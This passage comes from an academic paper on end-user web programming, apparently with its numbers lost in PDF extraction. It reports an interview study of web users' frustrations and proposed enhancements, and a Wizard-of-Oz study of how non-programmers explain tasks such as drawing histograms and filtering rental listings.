end-user programmers. mash maker (ennals et al., ) gives novice and expert end-users different roles: expert users extract semantic structures from raw web sites that novice end-users will use to create mashups. both studies in this paper improve our understanding of end-user software engineering. for example, findings from the interview study report the hidden costs of using third-party extensions. our wizard-of-oz study expands our understanding of non-programmers mental model, especially in collaboration with an intelligent agent. together, the two studies in this paper are complementary to the aforementioned work, providing guidance for the design of future eup systems. study : end-user needs on the web to better understand end-user needs on the web, we conducted a semi-structured interview study. the goal is to better understand the challenges that the participants experience, and enhancement ideas that they envision without technical constraints. the approach is to qualitatively analyze the participant responses to identify themes that should be considered in the development of future webeup systems. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table occupational background of the participants of study . graduate students engineering business psychology education professionals it specialists directors and office managers non-professionals (e.g., homemaker) total participants a total of participants ( male, female) were recruited via a university campus mailing list, social network, and word-of-mouth. they were on average . years old (sd= . ) and have a wide range of occupations as shown in table . every participant spends at least one hour per day on the web. a total of out of participants had used at least one programming language, and five participants had created web pages. however, none of them had the experience of end-user programming on the web. we did not offer any incentive for participation. procedure a total of interviews were conducted via a video chat program with shared screen (google hangout: (https://hangouts.google.com/), while the rest were face-to-face interviews at public areas such as libraries and cafes. the interviewer asked participants, ‘‘show me a couple web sites that you recently visited, tell us challenges that you experienced there. if you could hire a team of designers and developers for free, how would you improve the web sites?’’ we recorded (or videotaped for the face-to-face interviews) the participants visiting two to four sites they recently experienced problems. while demonstrating regular tasks on the sites, participants followed the think-aloud protocol. for the challenges they mentioned, we asked them to imagine a team of third-party developers, and to explain to the ‘‘team’’ an enhancement for the web site. each interview covered approximately three (m = . ) sites, and took approximately – min. the study was found to be exempt from irb review. data and analysis a total of participants demonstrated the use of sites (m = . ) that included online shopping ( sites), academic research ( ), streaming video ( ), news ( ), work-related sites ( ), forums ( ), search engines ( ), social network services ( ), travel ( ), finance ( ), review sites ( ), job market ( ), and weather ( ). note that these frequencies do not correlate the frequency of regular visits but the challenges that our participants experienced. while visiting the sites the participants explained challenges. every interview video was transcribed, and coded. as an exploratory work, we pursued an iterative analysis lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://hangouts.google.com/ http://dx.doi.org/ . /peerj-cs. approach using a mixture of inductive and deductive coding (hruschka et al., ; braun & clarke, ). first, we created a codebook derived from the literature (zang & rosson, ; cypher et al., ) and an initial post-interview discussion within the research team. the codebook included types of challenges (lack of relevant information, repetitive operations, poorly-organized information, privacy, security, fake information, bugs), and functionalities required for doing a wide range of webeup tasks (mashup, redesign, automation, social knowledge, sharing, monitoring). to assure high quality and reliable coding, two researchers independently coded ten randomly selected ideas. analyzing the inter-rater reliability (irr) of that analysis with krippendorff’s alpha (α= . ; total disagreements = out of ), we revised the codebook. then the two researchers coded another ten randomly selected ideas, and achieved a high irr (α= . ; total disagreements= out of ). after resolving every disagreement, the first researcher coded the remaining data. following the guide of thematic analysis (braun & clarke, ), we collated the different codes into potential themes, and drew initial thematic maps that represent the relationship between codes and themes. we then reviewed and refined the thematic maps, to make sure that data within a theme was internally coherent, and that different themes were distinguished as clearly as possible. the two following subsections summarize the two groups of themes: challenges that participants experience on the web, and functionalities of webeup for addressing those challenges. result: challenges four groups of common challenges and enhancement ideas follow. untruthful information while trust is a key element of success in online environments (corritore, kracher & wiedenbeck, ), participants reported four kinds of untruthful information on the internet. deceptive ads were reported by three participants. two of them reported deceptive advertisements that used confusing or untrue promises to mislead their consumers. for example, p gave a poignant example that a local business review site posts unavailable items on the internet: ‘‘if you’re looking for a contractor to work on your home, and other home stuff, [local business review site] shows them with ratings. a few weeks ago i started paying them again for other information, but they have something very frustrating. they have a several page list of mortgage brokers searchable from [search engine]. but when you pay the fee for their service, they have only a fraction of the information. i complained to them, but they have some stories why it is not... anyways, i canceled my membership without getting my one month fee refunded.’’ (p ) another participant tried to avoid using an online marketplace because of deceptive ads in it: ‘‘i know there are rental houses with good value on [online marketplace], but i do not use it often. there are too many liars on [online marketplace]. instead i post on [social network service] to get help or recommendations from people that i trust.’’ (p ) lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. links to low-quality content were reported by seven participants. during the interview, two participants clicked broken links to error pages. five participants reported that they had to spend significant time and effort to find high-quality video links in underground streaming video sites: ‘‘at [underground tv show sites], i have to try every link until i find the first ‘working’ link. by working, i mean the show must be [in] high-resolution, not opening any popup, and most of all as little ads as possible.’’ (p ) a straightforward solution is to attach quality markers next to the links. however, it is extremely challenging to define a metric of high-quality links that everybody will agree upon. virus and malware was reported by four participants. they were aware of the risks of installing programs downloaded from the internet, but estimating risks is often inaccurate. for example, two participants stopped using a streaming video site and a third-party plugin worrying about computer viruses, though in fact, those site and plugins were safe. ‘‘i used this streaming link site for a while, but not after a friend of mine told me her com- puter got infected with malwares from this web site. i wish i could check how trustworthy the site [is] when using [it].’’ (p ) ‘‘i have [used popup blocker extension], but am not using [it] now. those apps have viruses, don’t they? i also don’t use any extensions.’’ (p ) this suggests that end-users may have inaccurate knowledge about the risks of their activities on the internet. even though third-party programs provide terms and conditions, and permission requests, users are often ‘trained’ to give permission to popular apps (chia, yamamoto & asokan, ) as stated by p : ‘‘if the site is important to me, i just press the ‘agree’ button without reading.’’ opinion spam was reported by four participants. while social ratings and consumer reviews are conventional ways to see feedback on products and information, the reliability of the feedback is often questionable (ott et al., ). four participants reported concerns about opinion spam—inappropriate or fraudulent reviews created by hired people. for example, p reflected, ‘‘i saw that some sites have certificates, but they were on their own sites. so, who knows what they’re gonna do with that information? [...] for example, i had a terrible experience with a company that i hired for a kitchen sealing repair, even though they had an a+ rating on [a local business review site].’’ p also expressed concerns about fake reviews, ‘‘ratings are somewhat helpful. however, i cannot fully trust them especially when they have star ratings—they might have asked their friends and families to give them high ratings.’’ similar to deceptive ads, opinion spam is a gateway to serious financial risks such as nigerian scams (corritore, kracher & wiedenbeck, ), but there is no simple way to estimate the risk. summary. in order to deal with untruthful information, participants would look for more trustworthy alternatives. for example, p used a social network service instead of online marketplaces. if participants could not find an alternative source, they would assess the risks and benefits of using the untruthful information, and decide either to give up the task or to take the risk, as p said: ‘‘i don’t believe everything on the internet. but sometimes i have no other choices than to try it with caution.’’ the remaining issue is that estimating the risk of untruthful information is often quite difficult. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cognitive distraction most participants reported cognitive distractions that make information on the web hard to understand. we identified four types of cognitive distractions as listed below. abrupt design changes was reported by three participants. websites are occasionally redesigned—from a minor tune-up to a complete overhaul—for good reason. however, it often undermines the prior knowledge of its users, and makes the sites navigation difficult. for example, p could not find her favorite menu item because ‘‘the library recently changed its design, making it much harder to find the menu.’’ since she found a button for switching back to the classic design at the end, she didn’t take advantage of new features in the updated design. p shared a similar story: ‘‘one day facebook suddenly changed the timeline to show this double column view. that was very annoying.’’ annoying advertisements was reported by participants. we found that the degree of cognitive distraction varies across different types of ads. for example, ads with dynamic behavior are much more annoying than static banner ads: ‘‘there are popup ads that cover the content and follow your scrolling. although they usually have very small ‘x’ or ‘close’ buttons, i often miss-click the popup to open the web page. that’s pretty annoying.’’ (p ) this finding is consistent with prior research that found display ads with excessive animation impair user’s accuracy on cognitive tasks (goldstein, mcafee & suri, ). participants were using browser extensions (e.g., chrome adblock http://goo.gl/ra sdc) to automatically remove ads. however, one participant had stopped using it for security and usability issues: ‘‘i have, but am not using [adblock] now. those apps have viruses, don’t they? [...] they would be very useful in the beginning, however they also restrict in many ways. for example, the extension sometimes automatically block crucial popup windows. so i ended up manually pressing ‘x’ buttons.’’ (p ) unintuitive tasks. six participants reported that several websites are hard to use. for example, to create a new album in facebook, users are required to upload pictures first. this task model clearly did not match a participant’s mental model: ‘‘i tried to create a new photo album. but i could not find a way to create a new album without uploading a picture. that was a very annoying experience.’’ (p ). another user reported a similar issue of not being able to create a new contact after searching in a mailing list: ‘‘i’m adding a new person to the contact database. i should first search the last name in order not to put duplicate entry. if the name does not exist, it simply shows [ result found]. obviously i want to add a new entry, but there’s no button for that. that bugs me a lot, because i have to get back to the previous page and type the name again.’’ (p ) websites with unintuitive navigational structures would require users to do many repetitive trial-and-errors. ‘‘when preparing to visit a touristic place, i look for entrance fee, direction, and other basic information from their official sites. however, some sites have that information deep in lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://goo.gl/ra sdc http://dx.doi.org/ . /peerj-cs. their menu structure, so i had to spend much time finding them. i wish those information were summarized and shown in one page. sometimes it’s hard to find useful images for campsites or cabins. for example, i want to see the image of bathroom, but people upload pictures of fish they caught.’’ (p ) information overload. five participants reported that excessive and irrelevant information prevents them from understanding the main things that they care about. for example, p was disappointed at blog posts full of irrelevant information: ‘‘i was searching for tips to clean my computer. however, most blog posts have very long explanations of why i should keep computers clean without telling how to clean it till the end.’’ (p ) a long list without effective filtering also causes information overload as p stated: ‘‘i want these conferences filtered by deadline, for example, showing conferences whose deadlines are at least -month from now. also, if possible, the filter can look at descriptions of each venue and choose ones containing at least three relevant keywords.’’ a simple enhancement to solve this problem is to remove unnecessary, excessive information, which is often very hard to decide. for example, p criticized an online shopping site for having a lot of unnecessary and irrelevant information. however, when evaluating usefulness of individual components, she became more vigilant, and stressed that her opinions are personal and depending on her current situation. ‘‘i would remove these promoted products on the side bar. however, if these promotions were relevant to my current interest, i would keep them. [...] shopping cart and personal coupon box can be useful later. [...] i don’t need extra information about secured payment, getting products at the shop, or printing receipts.’’ (p ) to enhance websites with an over-abundance of information, participants envisioned creative scenarios including interactivity and design details. for example, p proposed to add a custom filter for a long list. p wanted to have the personalized summary at the top of a long document with a pop-up window for important information: ‘‘i do not read every terms and condition agreement. it’s too long and mostly irrelevant. however, it would be useful if hidden charges or tricky conditions were highlighted. i think critical information such as hidden charges can be shown in a pop-up window. it would be best the most important summary is shown at the top, because i could just click ’yes’ without scrolling it down.’’ (p ) repetitive operations participants reported tedious and repetitive operations on the web. based on them, we identified three common reasons for repetitive operations. unsupported tasks. seven participants wanted to automate repetitive tasks. efficient repeating of some of the tasks is unsupported by the websites. for example, four participants wanted to automate simple interactions such as downloading multiple files or clicking a range of checkboxes with a single click. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘‘[at an academic library], i click the ‘‘save to binder’’ button, then select a binder from the drop-down in a new window. then i click the ‘‘save’’ button then the ‘‘done’’ button, then close the window. it’s really annoying to do it over and over. it would be great to create a ‘‘save this!’’ button.’’ (p ) three participants wanted to automate filling the forms of personal / credit card information. information from multiple sources. reported by participants, integrating information from multiple sources is a common practice on the web (zang & rosson, b). end-users switch between browser tabs to compare information repeatedly, but it can be time consuming since it requires short-term memory to compare information on tabs that are not simultaneously visible. a total of participants wanted to save their time and effort by integrating information across multiple sources. for example, p told, ‘‘i often search for videos on youtube for baby diapers or other things to wear because those videos are very helpful to understand usage of products.’’ similarly, four participants wanted to integrate course schedule page with extra information available such as student reviews, lecture slides, and reading lists. time-sensitive information. five participants reported that they regularly check time- sensitive information such as price ( ), hot deals ( ), second-hand products ( ), and other notifications ( ). using price trends as an example, three participants envisioned a complex service that automatically archives price information retrieved from multiple sites, visualizes the price data as timeline graph, and sends email/mobile notifications when the price drops: ‘‘i can imagine that program or web site will be able to grab information, especially prices from various malls, and compare it automatically. it will also say ‘this is the lowest price for recent three months.’ so that i don’t have to visit amazon and newegg everyday. [...] i want it to send me email alerts—saying ‘hey, based on your recent search history on the canon g , we found these new deals and prices. it’s the lowest price in the last month.’ (p ) ‘‘[she opened http://camelcamelcamel.com] if i want to buy a bread machine, i search and choose one model. here the graph shows the price trend of the model. i can make a decision on whether i should buy or wait. unfortunately, this site only shows products from amazon.com.’’ (p ) privacy privacy did not come up much, but one participant (p ) expressed strong negative opinions about the way that a social networking service handles her data: ‘‘[at a social network service] a friend of mine told me that if i ’like’ her photos or put comment on them, others will be able to see it even if the photos are private. [...] here’s another example that i don’t like about [the sns]. one day i uploaded a family photo, and my family-in-law shared those photos. that’s totally fine. however, the problem began when friends of my family-in-law started liking and commenting on my family photos. i lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://camelcamelcamel.com http://amazon.com http://dx.doi.org/ . /peerj-cs. table potential functionality of web enhancements for addressing categories of challenges and enhancements identified from the interview study. ( ⊙ : the functionality is required or related to at least half of challenges and enhancements in the category,©: required by less than half,×: no enhancement or challenge in the category required the functionality). modify compute interactivity gather automate store notify untruthful information deceptive ads ⊙ ⊙ © © × × × links to low-quality content ⊙ ⊙ ⊙ © ⊙ ⊙ × virus and malware ⊙ ⊙ ⊙ ⊙ ⊙ ⊙ × opinion spam ⊙ © © ⊙ × ⊙ × cognitive distraction abrupt design changes ⊙ × ⊙ × ⊙ ⊙ × annoying advertisements ⊙ ⊙ ⊙ × ⊙ © × unintuitive tasks ⊙ © ⊙ ⊙ ⊙ × × information overload ⊙ ⊙ ⊙ × © ⊙ × repetitive operations unsupported tasks ⊙ × ⊙ © ⊙ ⊙ × information from multiple sources ⊙ ⊙ ⊙ ⊙ © © © time-sensitive information ⊙ © ⊙ ⊙ ⊙ ⊙ ⊙ privacy © × × × © © © received a lot of notifications of those activities by people i do not know at all. i felt a little scared.’’ (p ) as another example of privacy issues, p believed that her browser tracks her activity history, and shared it with online advertisement companies without her permission, because banner ads on other web pages show ads related to her previous activity. potential functionality of web enhancements this section presents functionalities that we believe future webeup systems should consider providing to address the challenges reported in the previous section. we identified seven functionalities: modify, compute, interactivity, gather, automate, store and notify. table illustrates how closely each functionality is related with the challenges. among them, interactivity, store, and notify are not generally supported by existing webeup systems. modify. modification of existing web pages is the most commonly required functionality for out of enhancements. examples include attaching new dom elements to the original pages ( enhancements), removing or temporarily hiding unnecessary elements ( enhancements), and highlighting information of interest by changing font size, color, or position (five enhancements). modification often involves adding new interactive behavior of web sites (eight enhancements). existing webeup tools support a wide range of modification such as removing unwanted dom elements (bolin et al., ), and attaching new dom elements or interactive behavior to existing elements (toomim et al., ). compute. a total of enhancements require a variety of computing data. for examples, enhancement ideas against untruthful information and distracting content on the web involve filtering elements by certain criteria. nine ideas of integrating lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. information from multiple sources require ‘compute’ functionality to extracting specific information from available documents. seven enhancement ideas require arithmetic operations. while computation is a fundamental part of programming languages, existing eup systems support it in varying degrees. for example, scripting languages (https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/) offer an extensive set of language constructs such as general-purpose languages (e.g., javascript). data integration systems (tuchinda, szekely & knoblock, ; wong & hong, ) focus on handling large amount of semi-structured text input, but provide less support on numerical operations. systems for automated browsing (miller et al., ; leshed et al., ) provide few language constructs for computation. interactivity. a total of enhancements across all categories (except the privacy issue) require interactive components to accommodate the dynamic and uncertain nature of the web and end-user needs. for example, enhancements include triggering buttons, because users wanted to make use of them in-situ. eight enhancements show previews of changes it will make on the original sites so that users can choose among them. enhancements often require users to configure options such as search keywords, filtering criteria, specific dom elements based on their information needs (eight enhancements). webeup tools often employ predefined interactive components such as buttons and preview widgets (toomim et al., ). however, none of them enable users to create their own interactivity. gather. a total of enhancements involve gathering information from either the current domain ( enhancements) or external sources (five enhancements). for example, to deal with various kinds of untruthful information, enhancements should be able to gather information from trustworthy sources. gathering is an essential part of integrating information from multiple sources, as p stated, ‘‘at various cosmetic malls, i wish the main listing page showed detailed direction on how to use the products.’’ in contrast, participants wanted to gather information from external sources that current sites are missing. infor- mation gathering is supported by mashup tools (wong & hong, ; ennals et al., ; tuchinda, szekely & knoblock, ). automate. a total of enhancements automate repetitive tasks that include filling in input forms (four enhancements), downloading multiple images and files (four), page navigation (three), clicking a series of buttons, checkboxes, and links (three), and keyword search (one). existing webeup tools such as coscripter (leshed et al., ) and inky (miller et al., ) support automating repetitive tasks. store. a total of enhancements store three types of data while being used. the first type relates to user’s activities such as filling input forms, page navigation, and job applications found in five enhancements. the second type is temporal information periodically gathered from designated sources such as online shopping malls, or ticketing sites found in five enhancements. the last is bookmarks of online resources such as news articles, blog posts, or streaming videos found in four enhancements. existing webeup systems such as coscripter (bogart et al., ) often provide public repositories for scripts, but none of them allow end-users to create custom storage of usage data. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/ http://dx.doi.org/ . /peerj-cs. notify. eight enhancements for integrating information from multiple sources (‘information from multiple sources’) and gathering time-sensitive information (‘time- sensitive information’) involve sending notifications to users via emails (seven) or sms messages (one), periodically or when user-specified events occur. to our knowledge, no existing webeup tool supports notification. discussion in this section, we discuss two design implications for future webeup systems and designing web sites in general. social platform beyond technical support traditional webeup systems focus on lowering the technical barrier of web programming. for example, mashup tools enable users to integrate information from multiple pages with just a few clicks. automation tools allow users to create macro scripts through demonstration. despite the advantage of those technical aids, we noted a few enhancement ideas require domain knowledge of multiple users who have the same information needs. for instance, when end-users want to integrate additional information with original pages, the key question is where the additional information can be found. when users want to focus on an important part of a long text, the key is which part of the text previous visitors found useful (similar to amazon kindle’s ‘‘popular highlights’’ feature.) an example of how a social platform could address the untruthful information issue follows. an end-user programmer creates and deploys an enhancement that attaches an interactive component (e.g., button for rating individual hyperlinks) to the original page. users who have installed the enhancement would use the new component to provide their knowledge (e.g., quality of the linked resources), which will be saved in the enhancement’s database. as more data is collected, the enhancement will become more powerful. to enable end-users to build social platforms in the aforementioned scenario, future webeup systems need two functionalities. first, end-user programmers should be able to create and attach interactive components that collect knowledge and feedback from users. second, end-user programmers should be able to set up centralized servers that communicate with individual enhancements running in each user’s browser, and store collected information. to our knowledge, no prior webeup system has fully supported these functionalities for social platforms. however, there are certainly custom solutions of this type that are commonly used such as, for example, turkopticon https://turkopticon.ucsd.edu/ that helps web workers using amazon mechanical turk rate job creators. alleviate the risk of using enhancements according to the attention investment framework (blackwell & burnett, ), end-users would decide whether to use an enhancement or not as a function of perceived benefit versus cost. even though our participants assumed no development costs, we could identify the following concerns about risks of using enhancements. uncertain needs. as mentioned earlier, the dynamic and uncertain nature of the web and end-user needs requires interactive behavior of enhancements. for example, p lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://turkopticon.ucsd.edu/ http://dx.doi.org/ . /peerj-cs. found advertisements on an online shopping site to be annoying, but did not remove the advertisements because of their potential usefulness in the future. webeup systems should be able to support interactivity so that users can change configurations or make decisions whenever their needs change. otherwise end-users will be forced to stop using it, as p and p did with non-interactive pop-up blockers. breaking the original design. enhancement developers should try to minimize unnecessary change of the original site. two participants expressed concerns about breaking the original site’s design and functionality: ‘‘i think the best part of craigslist is its simplicity. i might have seen the filters, but did not bother setting them every time i visit this site.’’ (p ) privacy and security. end-users have significant privacy and security concerns about installing extra software, especially those developed by third-party programmers. ironically, we observed end-users rarely read legal documents, and are trained to give permissions to popular apps. future work should confront these practical concerns and design how to communicate potential risks and treatments. implications for web site designers the seven categories of enhancements can be useful to web site designers as they think about what a wide range of users might want. there is another potential of more directly benefiting from end-user modifications to web sites. actual enhancements made by end-users could provide valuable feedback for designers of the sites if those desires were expressed via use of a webeup tool. for example, designers could learn what kind of information users consider to be untruthful by learning about user feedback on specific information. repetitive operations could be observed by seeing what modifications users make, etc. nevertheless those feedbacks cannot replace webeup, as designers and users often have conflicting interests. for instance, designers may not agree to remove advertisements that end-users find annoying since they provide revenue. some ideas may be useful for specific user groups but not for everyone, and so are not worth pursuing. ideally, designers should consider providing hooks or apis that enable end-users to build robust, high-quality enhancements. summary the interview study explored the space of challenges that end-users regularly experience on the web, and the functionalities of enhancements that they envisioned. the seven categories of enhancements can provide guidance to website designers in the first place to be aware of the unique needs of many users. also, webeup tools should allow end-user programmers to customize interactivity and design of enhancements they create. the interview study has a few limitations. first, participants is surely not large and diverse enough to fully represent the needs that all end-users might have. however, we believe that even this modest number has surfaced a significant number of important areas that need support. second, most participants shared their experience relating to non-professional tasks such as academic searches, shopping, and watching videos, but had little to discuss about professional activities. thus, the findings should be complemented by future research that focuses on professional activities. our exploratory study focused lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the study is exempt from irb review. table occupational background of the participants of study . graduate students engineering business education professionals it specialists directors and office managers non-professionals (e.g., homemaker) total on end-user needs without considering development costs. although our decision allowed end-users to express ideas more freely, future work needs to ask participants to both estimated cost and benefits in relation. study : non-programmers mental model of computational tasks programming is difficult to learn since its fundamental structure (e.g., looping, if-then conditional, and variable referencing) is not familiar or natural for non-programmers (pane, myers & ratanamahatana, ). understanding non-programmer’s mindset is an important step to develop an easy-to-learn programming environment. the second study builds on the enhancement ideas from the first study by examining how non-programmers naturally describe common computational tasks. since the study is designed to be open- ended and formative, participants were not provided with a specific tool or language constructs, but expressed intent via verbal statements, examples, and gestures. they also refined their expression through conversational dialogues with the interviewer using the wizard-of-oz technique. as result, the findings provide broad and general implications of how non-programmers express computational intent, and suggest open-ended research questions for future eup systems. participants the study was conducted with participants, including five males and eight females, average . years old (std = . ) with varying occupations as summarized in table . all of the participants were experienced computer users, but they all said that they had not programmed before. the participants were recruited by the university mailing list that we used in the first study. they received no compensation for participation in this study. method the study aims to characterize how non-programmers naturally describe complex tasks without being biased by specific language constructs or interactive components. we employed the wizard-of-oz technique (zimmerman et al., ) where the interviewer acted as a hypothetical computer agent that could understand the non-programmer’s verbal statements, behavioral signals (e.g., page navigation, mouse click), gestures, and lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. drawing on scratch paper, and help them through conversational dialogue. the computer agent (called ‘‘computer’’ from here on) followed the rules listed below. ( ) the computer can understand all the literal meaning of participants’ instruction, gestures, and drawings. however, the computer cannot automatically infer any semantic meaning of the task or the material. for example, a rental posting ‘‘ bedrooms lvl townhome $ , / br’’ is just a line of text to the computer. ( ) the computer can perceive a pattern from participant’s repeated examples and demonstration. for example, if a participant counted numbers within a range – in a table, the computer asks the participants ‘‘are you counting numbers that are within a specific range?’’ ( ) the computer can execute the participant’s instruction only if it is clearly specified without ambiguity. otherwise the computer asks for additional information to resolve it through conversational dialogue like below: programmer: delete houses with fewer than three bedrooms. computer: please tell me more about ‘houses with fewer than three bedrooms’. which part of the page is relevant? when the programmer demonstrates a set of examples, the computer will suggest a generalizing statement like below: programmer: delete this one because it contains br. computer: do you want me to delete every line that has br? a sheet of paper containing basic instruction was provided, and the participants could draw or write anything on the paper as shown in figs. and . we chose three tasks that end-user programmers commonly do. task . drawing histogram. given a sheet of paper containing a blank histogram and random numbers between and (see fig. ), the participants were asked to explain the computer how to draw a histogram of the numbers. the blank histogram has four bins ( ∼ , ∼ , ∼ , and ∼ ). the purpose of this task was to observe how non-programmers perform: ( ) common data-processing operations (e.g., iteration, filtering, and counting), and ( ) visualize numeric data by examples and demonstration. task . custom filter. we prepared rental postings in table copied from an online marketplace http://craigslist.com. the participants were asked to create a program that removes houses having fewer than three bedrooms. the program consists of three components: ( ) extracting text that represents the number of bedrooms in each post (e.g., ‘‘ br(s),’’ ‘‘ bedroom(s),’’ ‘‘ bedrooms,’’ ‘‘ / ’’), ( ) a conditional logic for filtering posts with less than three bedrooms, and ( ) removing/hiding the filtered houses. the purpose of the task is to observe how non-programmers decompose a big task into sub-tasks, specify extraction queries, and refer temporary variables such as sub-strings and selected postings. task . mash up. at amazon.com, each product has different options (e.g., available colors and sizes) that are shown in the product detail page. the participants are asked to create a program that extracts the available colors from detail pages, and attaches to the product listing. the purpose of the task is to understand how non-programmers would describe copy operations across multiple pages, and event handling. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://craigslist.com http://amazon.com http://dx.doi.org/ . /peerj-cs. figure an example drawing of task . participants were asked to explain how to draw a histogram of the numbers in the table. in this example, the participant gave histogram bins different codes (a–d), and marked each number with the codes. since the participant could not put into any bin, he marked the number with question mark and a line that points a missing bin. table task material. in task , the participants were asked to create a filter than removes houses with less than three bedrooms among housing rental posts scraped from http://craigslist.com. ‘‘you want to create a filter that removes houses having less than bed- rooms. how would you explain it to the computer?’’ •brand new townhome! $ , / br— ft —(clarksburg) •lanham / new deck $ , / ft —(lanham) • bedrooms lvl townhome $ , / br—(md) • comer square bel air, md $ , /studio ...( more)... procedure each session began with a brief interview about the participant’s programming experience and occupational background. the interviewer introduced the wizard-of-oz method, and gave an exercise task—ordering the interviewer (acting the hypothetical computer agent) to move a cup to another corner of the table. after participants said they fully understood the concept of the hypothetical computer agent, we started the actual study by introducing the three scenarios in a randomized order. for each scenario, participants were asked to explain the task to the ‘‘computer.’’ participants were allowed to finish or to give up a task at any point. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://craigslist.com http://dx.doi.org/ . /peerj-cs. figure an example drawing of task . in this example of task , the participant used scribbles along with verbal statements. for example, the participant wrote variations of keywords that indicate ‘‘bedroom’’ used in the list. he/she also circled and underlined the number of rooms in each title to demonstrate the text extraction logic, crossed out titles that did not meet the criteria, and drew arrows from houses to empty slots in the list. data and analysis the entire session was video recorded, and transcribed for qualitative analysis. the transcript of each task consists of a sequence of conversational dialogue between the participant and the interviewer, finger and mouse pointing gestures, scribbles on the paper (figs. and ; only for task and t ), and page scroll and mouse events in the browser (only for task ). to analyze the transcript, the first author created the initial codebook derived from the literature (pane, myers & ratanamahatana, ) and an initial post-interview discussion within the research team. the codebook included how the participants described and what challenges they experienced. while repeating the coding process, a few categories emerged: programming styles, imperative commands, ambiguities, and multi-modal intent. findings in this section we characterize how non-programmers describe computational tasks. participants were allowed to stop at any moment, but all of them could eventually complete tasks with the computer’s help. each task took an average of . s (sd= . ). we did lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure task material. in task , participants were asked to describe a simple mashup program that shows available colors of each individual product in the main page extracted from the product detail page. not observe any fatigue effect. since participants had very limited understanding of the computer at the beginning, most of their initial explanations were not very informative. thus the computer asked for further information as the examples below. (task . histogram) p : wouldn’t computers draw graph when numbers are assigned? i’m asking because i have no idea. p : find the numbers, and draw them at the first bin. computer: how can i draw them? p : what should i tell? color? (task . custom filter) p : first, i scan the list with my eyes and exclude them. they clearly stand out computer: how do they stand out? p : i’d order, ‘‘exclude houses with one or two bedrooms. ‘‘computer: how can i know the number of bedrooms? (task . mash up) p : i’d ask computer to show available colors of this columbia shirt. computer: where can i get available colors? lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. natural language tends to be underspecified and ambiguous (pane, myers & ratanamahatana, ). we frequently observed that our participants skipped mentioning essential information. for example, most participants did not specify how to iterate multiple elements in list. they instead demonstrated handling the first item, and expected the computer to automatically repeat the same process for the rest of the items. they did not refer to objects by names as programmers use variables. however, they referred to previously mentioned objects by their actual values (underlined in the following example), as p said, ‘‘in this next column, we need items going , , and . so please find those , , , and draw bar in this column.’’ they also used pronouns (e.g., ‘‘remove them’ ), data type (e.g., ‘‘attach colors" ), and gestures (e.g., ‘‘paste them here.’’ ). while loops and variable referencing are core concepts of programming languages, our findings suggest that non-programmers would find them unnecessary or even unnatural. we will discuss the issue further with design implications for future eup systems in the discussion section. through conversational dialogues, participants figured out what information the computer requires and how to explain. we found a few characteristics of how non- programmers explain computational tasks as listed below. explaining with rules and examples was used by of participants. when participants explained rules first, the following examples usually provided information that the rules were potentially missing. for example, while drawing a histogram for task , p stated a rule, ‘‘determine which bin each number is in,’’ followed by an example, ‘‘if the number is one (pointing the first item in the table), then count up this bin (pointing the first bin in the histogram).’’ participants also provided examples first, and then explained the rules. p doing task gave all the numbers ( , , and ) for the first bin, ‘‘for here (pointing the first column) we need , , and ’’, and then explained the range of those numbers, ‘‘find numbers including zero, smaller than two.’’ traditional programming languages rarely allow example-based programming. although eup systems often support programming-by- example (pbe) techniques, they do not allow this pattern—combining rules and examples to describe individual functional elements. elaborating general statement through iteration was observed for every participant. initial explanations of tasks were usually top-level actions (e.g., draw bars, remove houses, attach pictures) that contained a variety of ambiguities; but participants then iteratively elaborated the statements by adding more details. for example, p doing t described the top-level action, ‘‘attach pictures here.’’ then he elaborated where the pictures were taken from, ‘‘attach pictures from the pages.’’ he kept on elaborating what the pages are and how to extract pictures from the pages. for t , as another example, p told the computer, ‘‘draw a graph.’’ she then rephrased the statement with more details, ‘‘draw a graph to number .’’ this pattern is far from traditional programming languages that support users to create statements in the order of their execution. multi-modal expressions including gestures and scribbles were frequently used by all participants. while verbal statements were still the central part of explanation, they used gestures along with pronouns (e.g., ‘‘count these’’ , ‘‘put them here ’’), and lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. scribbles to supplement verbal statements like an example in fig. . while multi- modal expressions seem to be natural and effective for non-programmers, traditional programming environments rarely support them. rationales are not direct instructions for the computer. however, we consistently observed participants explaining rationales. for example, p doing t explained why she chose to attach small color chips rather than larger images, ‘‘while we can show images, which would be quite complex, i’d want you to do use color boxes.’’ p also explained rationale of her scribbles on the sheet of t , ‘‘we can also secretly write number here (center of each cell) to remember, so track for afterward so we didn’t make any mistake.’’ discussion this user study provides characteristics of non-programmers explaining how they would solve computational tasks. given that traditional programming environments do not fully support the way these participants conceptualized their solutions, we discuss the implicationsforthe designofmulti-modalandmixed-initiativeapproaches formakingend- user programming more natural and easy-to-use for these users. our recommendations are to: allow end-users to express ideas with combinations of rules, examples, gesture, and rationales. a common pattern of multi-modal intent expression is to generate rules (i.e., program modules) from examples or demonstrations, and to allow users to review and modify those rules (kandel et al., ; le, gulwani & su, ; yessenov et al., ). in such systems, different modalities have separated roles. our user study, in 